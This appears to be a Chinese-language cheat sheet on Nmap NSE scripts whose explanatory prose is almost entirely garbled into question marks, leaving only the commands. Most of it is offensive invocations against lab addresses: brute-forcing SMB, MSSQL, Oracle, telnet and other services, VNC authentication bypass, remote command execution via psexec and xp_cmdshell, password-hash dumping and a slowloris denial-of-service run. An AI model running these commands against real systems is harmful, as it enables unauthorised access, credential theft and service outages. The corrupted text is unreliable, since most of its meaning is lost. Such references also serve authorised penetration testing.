????-sC:?????--script=default?????????????????????????????????--script=
????scripts>:???????????????????裬???????????
????--script-args=:????????????
????--script-args-file=filename:??????????????????--script-trace:
????????????й????з?????????????--script-updatedb:???????????
????--script-help=:
???????????????????????в??????????????????????
????nmap??????????????????????????????????--script=????????????б?????????裺
????auth:??????????饗????????????
????broadcast:???????????????????????????dhcp/dns/sqlserver?????
????brute:?????????????????????????http/snmp??
????default:???-sC??-A?????????????????????????????????
????discovery:????????и???????????SMB????SNMP?????
????dos:??????о????????
????exploit:??????????????????
????external:?????????????????????????????whois????
????fuzzer:???????????????????????????????????????intrusive:??????????????????????????????IDS/IPS??????????
????malware:????????????????????????????????
????safe:??????intrusive??????????????
????version:?????????????汾??裨VersionDetection?????????
????vuln:??????????????г??????????Vulnerability???????????MS08_067
  ??1??nmap--script=auth192.168.137.*
??????????????饗????????????????????????????????????
??????2??nmap--script=brute192.168.137.*
????????????????????????smb??snmp????м????????????
??????3??nmap--script=default192.168.137.*????nmap-sC192.168.137.*
????????????裬??????????????÷???????????????????????????????й???
??????4??nmap--script=vuln192.168.137.*
???????????????????
??????5??nmap-n-p445--script=broadcast192.168.137.4
???????????????????????????
??????6??nmap--scriptexternal202.103.243.110
?????????????????????????????????whois????
  0×02nmap????÷??????
???????vncbypass
????1nmap--script=realvnc-auth-bypass192.168.137.4
???????vnc??????
????2nmap--script=vnc-auth192.168.137.4
???????vnc???
????3nmap--script=vnc-info192.168.137.4
??????2??smb??裺
????smb???
  nmap--script=smb-brute.nse192.168.137.4
????smb??????
  nmap--script=smb-brute.nse--script-args=userdb=/var/passwd??passdb=/var/passwd192.168.137.4
????smb????????????
  nmap--script=smb-check-vulns.nse--script-args=unsafe=1192.168.137.4
????????????
  nmap-p445--scriptsmb-ls--script-args‘share=e$??path=??smbuser=test??smbpass=test’192.168.137.4
????????????Щ??????????????????nmap_service??
  nmap-p445-n–script=smb-psexec--script-args=smbuser=test??smbpass=test192.168.137.4
????????
  nmap-n-p445--script=smb-enum-sessions.nse--script-args=smbuser=test??smbpass=test192.168.137.4
?????????
  nmap-n-p445--script=smb-os-discovery.nse--script-args=smbuser=test??smbpass=test192.168.137.4
????Mssql??裺
???????mssql???????????
  nmap-p1433--script=ms-sql-brute--script-args=userdb=/var/passwd??passdb=/var/passwd192.168.137.4
????xp_cmdshell???????
  nmap-p1433--scriptms-sql-xp-cmdshell--script-argsmssql.username=sa??mssql.password=sa??ms-sql-xp-cmdshell.cmd="netuser"192.168.137.4
????dumphash?
  nmap-p1433--scriptms-sql-dump-hashes.nse--script-argsmssql.username=sa??mssql.password=sa192.168.137.4
???????root?????
  nmap-p3306--script=mysql-empty-password.nse192.168.137.4
?????г?????mysql???
  nmap-p3306--script=mysql-users.nse--script-args=mysqluser=root192.168.137.4
????????????????н?????
  nmap--script=mysql-*192.168.137.4
??????5??Oracle??裺
????oraclesid???
  nmap--script=oracle-sid-brute-p1521-1560192.168.137.5
????oracle?????????
??nmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=ORCL??userdb=/var/passwd??passdb=/var/passwd192.168.137.5
??????6???????Щ?????????
  nmap--script=broadcast-netbios-master-browser192.168.137.4????????
????nmap-p873--scriptrsync-brute--script-args'rsync-brute.module=www'192.168.137.4???rsync
????nmap--scriptinformix-brute-p9088192.168.137.4informix????????
????nmap-p5432--scriptpgsql-brute192.168.137.4pgsql???
????nmap-sU--scriptsnmp-brute192.168.137.4snmp???
????nmap-sV--script=telnet-brute192.168.137.4telnet???
????nmap--script=http-vuln-cve2010-0738--script-args'http-vuln-cve2010-0738.paths={/path1/??/path2/}'jbossautopwn
????nmap--script=http-methods.nse192.168.137.4???http????
????nmap--scripthttp-slowloris--max-parallelism400192.168.137.4dos???????????????????С???????????'half-HTTP'connections
????nmap--script=samba-vuln-cve-2012-1182-p139192.168.137.4